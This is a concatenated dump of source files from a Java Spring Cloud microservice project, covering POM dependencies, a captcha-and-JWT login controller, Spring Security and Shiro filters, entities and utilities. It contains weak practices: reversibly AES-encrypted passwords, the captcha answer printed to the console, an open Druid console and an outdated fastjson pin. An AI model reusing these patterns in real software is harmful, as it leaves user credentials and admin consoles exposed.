<artifactId>lombok</artifactId>
</dependency>
<!-- mybatis-plus -->
<dependency>
<groupId>com.baomidou</groupId>
<artifactId>mybatis-plus-boot-starter</artifactId>
<version>${mybatis-plus.version}</version>
</dependency>
<!-- druid -->
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>druid-spring-boot-starter</artifactId>
<version>${druid.version}</version>
</dependency>
<!-- 动态数据源 -->
<dependency>
<groupId>com.baomidou</groupId>
<artifactId>dynamic-datasource-spring-boot-starter</artifactId>
<version>2.5.4</version>
</dependency>
<!-- json -->
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.69</version>
</dependency>
<!--mysql-->
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>5.1.47</version>
<scope>runtime</scope>
</dependency>
<!-- sqlserver-->
<dependency>
<groupId>com.microsoft.sqlserver</groupId>
<artifactId>sqljdbc4</artifactId>
<version>4.0</version>
<scope>runtime</scope>
</dependency>
<!-- oracle驱动 -->
<dependency>
<groupId>com.oracle</groupId>
<artifactId>ojdbc6</artifactId>
<!-- NOTE(review): version was mangled into an IP-like placeholder; ojdbc6 is not on
     Maven Central — install the real artifact (e.g. 11.2.0.3) into a private repo -->
<version>11.2.0.3</version>
<scope>runtime</scope>
</dependency>
<!-- postgresql驱动 -->
<dependency>
<groupId>org.postgresql</groupId>
<artifactId>postgresql</artifactId>
<version>42.2.6</version>
<scope>runtime</scope>
</dependency>
<!-- Quartz定时任务 -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-quartz</artifactId>
</dependency>
<!--JWT-->
<dependency>
<groupId>com.auth0</groupId>
<artifactId>java-jwt</artifactId>
<version>3.7.0</version>
</dependency>
<!-- Swagger API文档 -->
<dependency>
<groupId>io.springfox</groupId>
<artifactId>springfox-swagger2</artifactId>
<version>${swagger2.version}</version>
</dependency>
<dependency>
<groupId>com.github.xiaoymin</groupId>
<artifactId>swagger-bootstrap-ui</artifactId>
<version>1.9.3</version>
</dependency>
<!-- Redis -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-redis</artifactId>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-pool2</artifactId>
</dependency>
<dependency>
<groupId>cn.hutool</groupId>
<artifactId>hutool-all</artifactId>
<version>5.3.5</version>
</dependency>
<!-- Java图形验证码 -->
<dependency>
<groupId>com.github.whvcse</groupId>
<artifactId>easy-captcha</artifactId>
<version>1.6.2</version>
</dependency>
<!--server-api-->
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
</dependency>
<!-- mini文件存储服务 -->
<dependency>
<groupId>io.minio</groupId>
<artifactId>minio</artifactId>
<version>4.0.0</version>
<exclusions>
<exclusion>
<artifactId>guava</artifactId>
<groupId>com.google.guava</groupId>
</exclusion>
<exclusion>
<artifactId>jsr305</artifactId>
<groupId>com.google.code.findbugs</groupId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
<version>${guava.version}</version>
</dependency>
<!-- 阿里云短信 -->
<dependency>
<groupId>com.aliyun</groupId>
<artifactId>aliyun-java-sdk-dysmsapi</artifactId>
<version>${aliyun-java-sdk-dysmsapi.version}</version>
</dependency>
<!-- aliyun oss -->
<dependency>
<groupId>com.aliyun.oss</groupId>
<artifactId>aliyun-sdk-oss</artifactId>
<version>${aliyun.oss.version}</version>
</dependency>
<!-- 第三方登录 -->
<dependency>
<groupId>com.xkcoding.justauth</groupId>
<artifactId>justauth-spring-boot-starter</artifactId>
<version>1.3.2</version>
<exclusions>
<exclusion>
<artifactId>fastjson</artifactId>
<groupId>com.alibaba</groupId>
</exclusion>
</exclusions>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<!--引用公共-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-common</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
<!--shiro权限-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-shiro</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
<!--security权限-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-security</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
<!--集成logstash-->
<dependency>
<groupId>net.logstash.logback</groupId>
<artifactId>logstash-logback-encoder</artifactId>
<version>${logstash-logback.version}</version>
</dependency>
<!-- 七牛云SDK -->
<!-- <dependency>-->
<!-- <groupId>com.qiniu</groupId>-->
<!-- <artifactId>qiniu-java-sdk</artifactId>-->
<!-- <version>7.2.23</version>-->
<!-- </dependency>-->
<!-- spring-cloud-->
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-dependencies</artifactId>
<version>Greenwich.SR3</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>com.alibaba.cloud</groupId>
<artifactId>spring-cloud-alibaba-dependencies</artifactId>
<version>2.1.0.RELEASE</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<pluginManagement>
<plugins>
<!-- <plugin>-->
<!-- <groupId>org.apache.maven.plugins</groupId>-->
<!-- <artifactId>maven-compiler-plugin</artifactId>-->
<!-- <configuration>-->
<!-- <source>1.8</source>-->
<!-- <target>1.8</target>-->
<!-- <encoding>UTF-8</encoding>-->
<!-- </configuration>-->
<!-- </plugin>-->
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<!--Docker配置-->
<plugin>
<groupId>com.spotify</groupId>
<artifactId>docker-maven-plugin</artifactId>
<version>${docker.maven.plugin.version}</version>
<executions>
<execution>
<id>build-image</id>
<phase>package</phase>
<goals>
<goal>build</goal>
</goals>
</execution>
</executions>
<configuration>
<!--docker 镜像名称-->
<imageName>micro/${project.artifactId}:${project.version}</imageName>
<!--docker 路径-->
<dockerHost>${docker.host}</dockerHost>
<baseImage>java:8</baseImage>
<!--执行执行docker命令-->
<entryPoint>["java", "-jar", "-Dspring.profiles.active=prod","/${project.build.finalName}.jar"]
</entryPoint>
<!-- <entryPoint>[docker rmi $(docker images -f "dangling=true" -q)]-->
<!-- </entryPoint>-->
<forceTags>true</forceTags>
<!--复制jar到docker的指定容器-->
<resources>
<resource>
<targetPath>/</targetPath>
<directory>${project.build.directory}</directory>
<include>${project.build.finalName}.jar</include>
</resource>
</resources>
</configuration>
</plugin>
</plugins>
</pluginManagement>
<!--支持在yml文件中使用@@来引用pom文件中的变量-->
<resources>
<resource>
<directory>src/main/resources</directory>
<filtering>true</filtering>
</resource>
</resources>
</build>
</project><file_sep>/micro-cloud-demo/src/main/java/com/cloud/modules/system/controller/LoginController.java
package com.cloud.modules.system.controller;
import cn.hutool.core.util.IdUtil;
import com.alibaba.fastjson.JSONObject;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.bo.SysUserDetails;
import com.cloud.common.api.Result;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.config.JwtConfig;
import com.cloud.modules.system.service.ISysUserService;
import com.cloud.security.TokenProvider;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.system.model.SysLoginModel;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.StringUtils;
import com.cloud.modules.utils.encryption.AesEncryptUtil;
import com.cloud.util.JwtTokenUtil;
import com.wf.captcha.ArithmeticCaptcha;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.context.SecurityContextHolder;
import org.springframework.web.bind.annotation.*;
import javax.servlet.http.HttpServletRequest;
import javax.validation.Valid;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.TimeUnit;
@Slf4j
@RestController
@RequestMapping("sys")
@Api(tags = "Spring Security 登录")
public class LoginController {
@Autowired
private RedisUtils redisUtils;
@Autowired
private ISysUserService sysUserService;
@Autowired
private JwtTokenUtil jwtTokenUtil;
@AnonymousAccess
@PostMapping("/login")
@ApiOperation("用户登录")
public Result<JSONObject> login(@RequestBody @Valid SysLoginModel sysLoginModel){
Result<JSONObject> res = new Result<>();
String username = sysLoginModel.getUsername();
String password = sysLoginModel.getPassword();
// 获取到验证码
String checkCode = (String) redisUtils.get(sysLoginModel.getUuid());
// 清除验证码
redisUtils.del(sysLoginModel.getUuid());
if(StringUtils.isBlank(checkCode)){
res.error500("验证码不存在或已过期");
return res;
}
if(StringUtils.isBlank(sysLoginModel.getCaptcha()) || !sysLoginModel.getCaptcha().equalsIgnoreCase(checkCode)){
res.error500("验证码错误");
return res;
}
SysUser user = sysUserService.getUserByName(username);
// 密码验证
String encryptPassword = "";
try {
// 密码加密
encryptPassword = AesEncryptUtil.encrypt(password);
}catch (Exception e){
e.printStackTrace();
}
if(!encryptPassword.equals(user.getPassword())){
res.error500("用户名或者密码错误");
return res;
}
// 保存在线用户
LoginUser loginUser = new LoginUser();
BeanUtils.copyProperties(user,loginUser);
SysUserDetails userDetails = new SysUserDetails(loginUser);
UsernamePasswordAuthenticationToken authentication = new
UsernamePasswordAuthenticationToken(userDetails, null);
SecurityContextHolder.getContext().setAuthentication(authentication);
// 生成token
String token = jwtTokenUtil.generateToken(userDetails);
// 设置Token缓存有效时间
redisUtils.set(CommonConstant.PREFIX_USER_TOKEN + token,token);
redisUtils.expire(CommonConstant.PREFIX_USER_TOKEN + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
// 保存在线用户
redisUtils.set(CacheConstant.SYS_USERS_CACHE + ":" + token,loginUser);
redisUtils.expire(CacheConstant.SYS_USERS_CACHE + ":" + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
JSONObject obj = new JSONObject();
obj.put("token", token);
obj.put("userInfo", loginUser);
res.setSuccess(true);
res.setResult(obj);
return res;
}
/**
* 获取验证码(EasyCaptcha)
* 请参考:https://gitee.com/whvse/EasyCaptcha
*/
@AnonymousAccess
@GetMapping("/getImageCode")
@ApiOperation("获取图像验证码")
public Result<Map<String,Object>> getImageCode(){
Result res = new Result();
// 验证码为算数类型
ArithmeticCaptcha captcha = new ArithmeticCaptcha(111, 36);
// 设置几位数运算 默认是两位
captcha.setLen(2);
// 获取到运算结果
String result = captcha.text();
System.out.println("-------------验证码----------------" + result);
// 生成验证码唯一标识
String uuid = JwtConfig.CODEKEY + IdUtil.simpleUUID();
// 保存验证码(1分钟)
redisUtils.set(uuid,result,1L);
Map<String,Object> map = new HashMap<String, Object>(2){{
put("uuid",uuid);
put("img",captcha.toBase64());
}};
res.setResult(map);
return res;
}
@PostMapping("/test1")
// @AnonymousAccess
@ApiOperation("测试 Spring Security权限")
public Result<?> testSecurity(){
return Result.ok("hello world.................");
}
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/system/entity/SysUser.java
package com.cloud.modules.system.entity;
import com.baomidou.mybatisplus.annotation.TableLogic;
import com.baomidou.mybatisplus.annotation.TableName;
import com.fasterxml.jackson.annotation.JsonFormat;
import com.fasterxml.jackson.annotation.JsonProperty;
import lombok.Data;
import lombok.EqualsAndHashCode;
import lombok.ToString;
import lombok.experimental.Accessors;
import org.springframework.format.annotation.DateTimeFormat;
import java.io.Serializable;
import java.util.Date;
@Data
@ToString
@TableName("sys_user")
@Accessors(chain = true)
@EqualsAndHashCode(callSuper = false)
public class SysUser extends BaseEntity implements Serializable {
private static final long serialVersionUID = 1L;
/**
* Login account
*/
private String username;
/**
* Real name
*/
private String realname;
/**
* Password (write-only: never serialized back to clients)
*/
@JsonProperty(access = JsonProperty.Access.WRITE_ONLY)
private String password;
/**
* Avatar
*/
private String avatar;
/**
* Birthday
*/
@JsonFormat(timezone = "GMT+8", pattern = "yyyy-MM-dd")
@DateTimeFormat(pattern = "yyyy-MM-dd")
private Date birthday;
/**
* Gender (1: male, 2: female)
*/
private Integer sex;
/**
* E-mail address
*/
private String email;
/**
* Phone number
*/
private String phone;
/**
* Department code (department selected at login)
*/
private String orgCode;
/**
* User status (1: normal, 2: frozen)
*/
private Integer status;
/**
* Deletion flag (0: normal, 1: deleted) — logical delete
*/
@TableLogic
private Integer delFlag;
/**
* Work number, unique key
*/
private String workNo;
/**
* Post/position, references the post table
*/
private String post;
/**
* Landline number
*/
private String telephone;
/**
* Sync with the workflow engine (1: sync, 0: do not sync)
*/
private Integer activitiSync;
/**
* User identity (0: ordinary member, 1: superior)
*/
private Integer userIdentity;
/**
* Departments this user is in charge of
*/
private String departIds;
/**
* Unique id from third-party login
*/
private String thirdId;
/**
* Third-party login type
* (github/github, wechat_enterprise/enterprise WeChat, dingtalk/DingTalk)
*/
private String thirdType;
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/config/SecurityConfig.java
package com.cloud.config;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.security.JwtAccessDeniedHandler;
import com.cloud.security.JwtAuthenticationEntryPoint;
import com.cloud.security.TokenConfigurer;
import com.cloud.modules.utils.SpringContextUtils;
import com.cloud.security.TokenFilter;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.http.HttpMethod;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.config.http.SessionCreationPolicy;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter;
import org.springframework.web.filter.CorsFilter;
import org.springframework.web.method.HandlerMethod;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
@Slf4j
@Configuration
@EnableWebSecurity // enable Spring Security's web security support
@EnableGlobalMethodSecurity(prePostEnabled = true, securedEnabled = true)
public class SecurityConfig extends WebSecurityConfigurerAdapter {
@Autowired
private JwtAuthenticationEntryPoint authenticationEntryPoint;
@Autowired
private JwtAccessDeniedHandler jwtAccessDeniedHandler;
/**
* Builds the stateless, JWT-based security filter chain.
* Handlers annotated with @AnonymousAccess are collected from the request
* mappings and whitelisted, alongside static resources, swagger, druid, etc.
*/
@Override
protected void configure(HttpSecurity httpSecurity) throws Exception {
// @AnonymousAccess marks endpoints that allow anonymous access.
// Collect every URL pattern whose handler method carries the annotation.
Map<RequestMappingInfo, HandlerMethod> handlerMethodMap =
SpringContextUtils.getBean(RequestMappingHandlerMapping.class).getHandlerMethods();
Set<String> anonymousUrls = new HashSet<>();
for (Map.Entry<RequestMappingInfo, HandlerMethod> infoEntry : handlerMethodMap.entrySet()) {
HandlerMethod handlerMethod = infoEntry.getValue();
AnonymousAccess anonymousAccess = handlerMethod.getMethodAnnotation(AnonymousAccess.class);
if (null != anonymousAccess) {
anonymousUrls.addAll(infoEntry.getKey().getPatternsCondition().getPatterns());
}
}
// Disable CSRF
httpSecurity
// https://blog.csdn.net/qq_35226176/article/details/106154774
// CSRF must be disabled here, otherwise POST requests neither fail nor return anything
.csrf().disable()
// exception handling configuration
.exceptionHandling()
// authentication failures (401)
.authenticationEntryPoint(authenticationEntryPoint)
// authorization failures (403)
.accessDeniedHandler(jwtAccessDeniedHandler)
// allow iframes (avoid X-Frame-Options breaking embedded pages)
.and()
// security headers on the response
.headers()
.frameOptions()
.disable()
// no HTTP session is created: JWT makes the app stateless
.and()
.sessionManagement()
.sessionCreationPolicy(SessionCreationPolicy.STATELESS)
.and()
// authorization rules
.authorizeRequests()
.antMatchers("/").permitAll()
// static resources
.antMatchers(
HttpMethod.GET,
"/*.html",
"/**/*.html",
"/**/*.css",
"/**/*.js",
"/webSocket/**"
).permitAll()
// swagger documentation
.antMatchers("/swagger-ui.html").permitAll()
.antMatchers("/swagger**/**").permitAll()
.antMatchers("/v2/**").permitAll()
.antMatchers("/swagger-resources/**").permitAll()
.antMatchers("/*/api-docs").permitAll()
// files
.antMatchers("/avatar/**").permitAll()
.antMatchers("/file/**").permitAll()
// Alibaba druid console
.antMatchers("/druid/**").permitAll()
// allow OPTIONS preflight requests
// .antMatchers(HttpMethod.OPTIONS, "/**").permitAll()
// whitelist every @AnonymousAccess URL collected above
.antMatchers(anonymousUrls.toArray(new String[0])).permitAll()
// everything else requires authentication
.anyRequest().authenticated()
// plug in the custom JWT filter
.and()
.apply(TokenConfigurer());
}
// Bean method deliberately capitalized to keep the existing bean name.
@Bean
public TokenConfigurer TokenConfigurer() {
return new TokenConfigurer();
}
}
<file_sep>/micro-cloud-gateway/src/main/java/com/cloud/MicroGatewayApplication.java
package com.cloud;
import lombok.extern.slf4j.Slf4j;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.cloud.client.discovery.EnableDiscoveryClient;
import org.springframework.cloud.gateway.route.RouteLocator;
import org.springframework.cloud.gateway.route.builder.RouteLocatorBuilder;
import org.springframework.context.ConfigurableApplicationContext;
import org.springframework.core.env.Environment;
import java.net.InetAddress;
import java.net.UnknownHostException;
@Slf4j
@SpringBootApplication
@EnableDiscoveryClient
public class MicroGatewayApplication {
/**
* Gateway entry point: boots the Spring context, then logs the local and
* external access URLs (doc.html is the swagger-bootstrap-ui front page).
*/
public static void main(String[] args) throws UnknownHostException {
ConfigurableApplicationContext applicationContext = SpringApplication.run(MicroGatewayApplication.class, args);
// NOTE(review): reads the "jeecg.test" property — looks like leftover debug code; confirm before removing.
String userName = applicationContext.getEnvironment().getProperty("jeecg.test");
Environment env = applicationContext.getEnvironment();
String ip = InetAddress.getLocalHost().getHostAddress();
String port = env.getProperty("server.port");
System.err.println("user name :" +userName);
log.info("\n----------------------------------------------------------\n\t" +
"Application Micro-Cloud is running! Access URLs:\n\t" +
"Local: \t\thttp://localhost:" + port + "/doc.html" + "\n\t" +
"External: \thttp://" + ip + ":" + port + "/doc.html" + "\n\t" +
"Swagger-UI: \t\thttp://" + ip + ":" + port + "/doc.html\n" +
"--------------------------网关启动成功-------------------------");
}
//@Bean
// Code-based route configuration (disabled; routes normally come from config).
// Demonstrates path, host, rewrite and hystrix-wrapped routes.
public RouteLocator customRouteLocator(RouteLocatorBuilder builder) {
return builder.routes()
.route("path_route", r -> r.path("/get")
.uri("http://httpbin.org"))
.route("baidu_path_route", r -> r.path("/baidu")
.uri("https://news.baidu.com/guonei"))
.route("host_route", r -> r.host("*.myhost.org")
.uri("http://httpbin.org"))
.route("rewrite_route", r -> r.host("*.rewrite.org")
.filters(f -> f.rewritePath("/foo/(?<segment>.*)", "/${segment}"))
.uri("http://httpbin.org"))
.route("hystrix_route", r -> r.host("*.hystrix.org")
.filters(f -> f.hystrix(c -> c.setName("slowcmd")))
.uri("http://httpbin.org"))
.route("hystrix_fallback_route", r -> r.host("*.hystrixfallback.org")
.filters(f -> f.hystrix(c -> c.setName("slowcmd").setFallbackUri("forward:/hystrixfallback")))
.uri("http://httpbin.org"))
.build();
}
}
package com.cloud.feign.factory;
import com.cloud.feign.SysLogFeignClient;
import feign.hystrix.FallbackFactory;
import lombok.extern.slf4j.Slf4j;
import org.springframework.stereotype.Component;
@Slf4j
public class SysLogFeignClientFallbackFactory implements FallbackFactory<SysLogFeignClient> {
@Override
public SysLogFeignClient create(Throwable throwable) {
return null;
}
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/utils/CommonUtils.java
package com.cloud.modules.utils;
import com.cloud.common.constant.DataBaseConstant;
import lombok.extern.slf4j.Slf4j;
import javax.sql.DataSource;
import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.SQLException;
@Slf4j
public class CommonUtils {

    /**
     * Strips any leading path (Windows or Unix style) from an uploaded file
     * name and removes characters that are unsafe for later processing.
     *
     * @param fileName possibly path-qualified file name
     * @return bare file name with "=", "," and "&" removed
     */
    public static String getFileName(String fileName) {
        // Position of the last Unix-style separator.
        int unixSep = fileName.lastIndexOf('/');
        // Position of the last Windows-style separator.
        int winSep = fileName.lastIndexOf('\\');
        // Cut at the latest possible point (FIX(style): Math.max replaces the ternary).
        int pos = Math.max(winSep, unixSep);
        if (pos != -1) {
            // A path separator was found: keep only the trailing segment.
            fileName = fileName.substring(pos + 1);
        }
        // Strip special characters from the uploaded file name.
        return fileName.replace("=", "").replace(",", "").replace("&", "");
    }

    /** Cached database type of the current system ("" until first resolved). */
    private static String DB_TYPE = "";

    /**
     * Returns the database type constant of the application's primary
     * DataSource, caching the answer after the first successful lookup.
     *
     * @return one of DataBaseConstant.DB_TYPE_*, or "" when the lookup fails
     */
    public static String getDatabaseType() {
        if (oConvertUtils.isNotEmpty(DB_TYPE)) {
            return DB_TYPE;
        }
        DataSource dataSource = SpringContextUtils.getApplicationContext().getBean(DataSource.class);
        try {
            return getDatabaseTypeByDataSource(dataSource);
        } catch (SQLException e) {
            log.warn(e.getMessage());
            return "";
        }
    }

    /**
     * Resolves the database type from the JDBC metadata of a connection.
     *
     * @throws SQLException       if a connection cannot be obtained or closed
     * @throws IllegalAccessError for unrecognized database products (an Error,
     *                            so it deliberately escapes the catch below)
     */
    private static String getDatabaseTypeByDataSource(DataSource dataSource) throws SQLException {
        if ("".equals(DB_TYPE)) {
            // FIX: try-with-resources closes the connection on every path
            // (the original closed it by hand in a finally block).
            try (Connection connection = dataSource.getConnection()) {
                DatabaseMetaData md = connection.getMetaData();
                String dbType = md.getDatabaseProductName().toLowerCase();
                if (dbType.contains("mysql")) {
                    DB_TYPE = DataBaseConstant.DB_TYPE_MYSQL;
                } else if (dbType.contains("oracle")) {
                    DB_TYPE = DataBaseConstant.DB_TYPE_ORACLE;
                } else if (dbType.contains("sqlserver") || dbType.contains("sql server")) {
                    DB_TYPE = DataBaseConstant.DB_TYPE_SQLSERVER;
                } else if (dbType.contains("postgresql")) {
                    DB_TYPE = DataBaseConstant.DB_TYPE_POSTGRESQL;
                } else {
                    throw new IllegalAccessError("数据库类型:[" + dbType + "]不识别!");
                }
            } catch (Exception e) {
                // Keep the original best-effort behavior: log and fall through
                // with DB_TYPE still "" rather than failing the caller.
                log.error(e.getMessage(), e);
            }
        }
        return DB_TYPE;
    }
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/security/TokenConfigurer.java
package com.cloud.security;
import lombok.extern.slf4j.Slf4j;
import org.springframework.security.config.annotation.SecurityConfigurerAdapter;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.web.DefaultSecurityFilterChain;
import org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter;
@Slf4j
public class TokenConfigurer extends SecurityConfigurerAdapter<DefaultSecurityFilterChain, HttpSecurity> {

    /**
     * Registers the JWT token filter ahead of Spring Security's
     * username/password filter so each request is authenticated from
     * its token before form-login processing runs.
     */
    @Override
    public void configure(HttpSecurity httpSecurity) throws Exception {
        // Insert the custom JWT filter before the form-login filter.
        httpSecurity.addFilterBefore(new TokenFilter(), UsernamePasswordAuthenticationFilter.class);
    }
}
<file_sep>/micro-cloud-system/src/main/java/com/cloud/modules/system/controller/SysLogController.java
package com.cloud.modules.system.controller;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.cloud.common.api.Result;
import com.cloud.modules.system.service.ISysLogService;
import com.cloud.modules.system.entity.SysLog;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@Slf4j
@RestController
@Api("日志操作类")
@RequestMapping("/sys/log")
public class SysLogController {
@Autowired
private ISysLogService sysLogService;
/**
* Persists a system log entry.
* Called automatically via AOP + a Feign remote call whenever a user
* performs an operation — not intended for direct front-end use, hence
* the commented-out @ApiOperation.
*
* @param jsonObject JSON payload describing the log entry
* @return an empty success Result
*/
@PostMapping("/save")
// @ApiOperation("新增日志") // invoked by the system itself; not exposed to front-end developers
public Result<?> saveLog(@RequestBody JSONObject jsonObject){
Result<?> res = new Result<>();
// Convert the JSON payload into a SysLog entity.
SysLog sysLog = JSON.parseObject(jsonObject.toJSONString(), SysLog.class);
sysLogService.save(sysLog);
return res;
}
}
<file_sep>/micro-cloud-shiro/src/main/java/com/cloud/modules/shiro/authc/aop/JwtFilter.java
package com.cloud.modules.shiro.authc.aop;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.modules.shiro.authc.JwtToken;
import com.cloud.modules.shiro.vo.DefContants;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.SpringContextUtils;
import com.cloud.modules.utils.StringUtils;
import lombok.extern.slf4j.Slf4j;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.subject.PrincipalCollection;
import org.apache.shiro.web.filter.authc.BasicHttpAuthenticationFilter;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.server.reactive.ServerHttpRequest;
import org.springframework.web.method.HandlerMethod;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import java.util.Map;
import java.util.Set;
/**
 * Shiro authentication filter: authenticates every request from its JWT
 * unless the target handler method is annotated with @AnonymousAccess.
 */
@Slf4j
public class JwtFilter extends BasicHttpAuthenticationFilter {
@Autowired
private RedisUtils redisUtils;
/**
* Performs login authentication for the current request.
* Requests whose handler carries @AnonymousAccess are let through without
* a token; all others are submitted to the Shiro realm via executeLogin.
* NOTE(review): this scans every request mapping on every request —
* consider caching the anonymous URL set.
*/
@Override
protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
try {
// Requested URL path.
String url = ((HttpServletRequest) request).getRequestURI();
// Collect all handler mappings to look for the @AnonymousAccess marker.
Map<RequestMappingInfo, HandlerMethod> handlerMethodMap = SpringContextUtils.getBean(RequestMappingHandlerMapping.class)
.getHandlerMethods();
for (Map.Entry<RequestMappingInfo, HandlerMethod> infoEntry : handlerMethodMap.entrySet()) {
Set<String> requestURIS = infoEntry.getKey().getPatternsCondition().getPatterns();
for(String requestURI : requestURIS){
// If the handler mapped to this exact path carries @AnonymousAccess, let it through.
if(url.equals(requestURI)){
HandlerMethod handlerMethod = infoEntry.getValue();
AnonymousAccess anonymousAccess = handlerMethod.getMethodAnnotation(AnonymousAccess.class);
if (null != anonymousAccess) {
log.info("-------使用匿名访问注解 @AnonymousAccess 放行--------");
return true;
}
}
}
}
executeLogin(request, response);
return true;
} catch (Exception e) {
// Any failure during token login is surfaced as an authentication error.
throw new AuthenticationException("Token失效,请重新登录", e);
}
}
/**
* Reads the token from the X-Access-Token header and submits it to the
* Shiro realm; the realm throws on an invalid token, which is caught above.
*/
@Override
protected boolean executeLogin(ServletRequest request, ServletResponse response) throws Exception {
HttpServletRequest httpServletRequest = (HttpServletRequest) request;
String token = httpServletRequest.getHeader(DefContants.X_ACCESS_TOKEN);
JwtToken jwtToken = new JwtToken(token);
// Hand the token to the realm; an invalid token raises an exception here.
getSubject(request, response).login(jwtToken);
// No exception means login succeeded.
return true;
}
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/system/entity/SysLog.java
package com.cloud.modules.system.entity;
import com.baomidou.mybatisplus.annotation.TableName;
import java.io.Serializable;
import lombok.Data;
import lombok.EqualsAndHashCode;
import lombok.experimental.Accessors;
/**
 * System log table entity (sys_log).
 */
@Data
@TableName("sys_log")
@Accessors(chain = true)
@EqualsAndHashCode(callSuper = false)
public class SysLog extends BaseEntity implements Serializable {
private static final long serialVersionUID = 1L;
/**
* Elapsed time
*/
private Long costTime;
/**
* IP
*/
private String ip;
/**
* Request parameters
*/
private String requestParam;
/**
* Request type
*/
private String requestType;
/**
* Request path
*/
private String requestUrl;
/**
* Request method
*/
private String method;
/**
* Operator's user name
*/
private String username;
/**
* Operator's user account
*/
private String userid;
/**
* Detailed operation log content
*/
private String logContent;
/**
* Log type (1: login log, 2: operation log)
*/
private Integer logType;
/**
* Operation type (1: query, 2: add, 3: modify, 4: delete, 5: import, 6: export)
*/
private Integer operateType;
}
<file_sep>/micro-cloud-common/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<parent>
<artifactId>micro-cloud</artifactId>
<groupId>com.cloud</groupId>
<version>1.0-SNAPSHOT</version>
</parent>
<modelVersion>4.0.0</modelVersion>
<artifactId>micro-cloud-common</artifactId>
<packaging>jar</packaging>
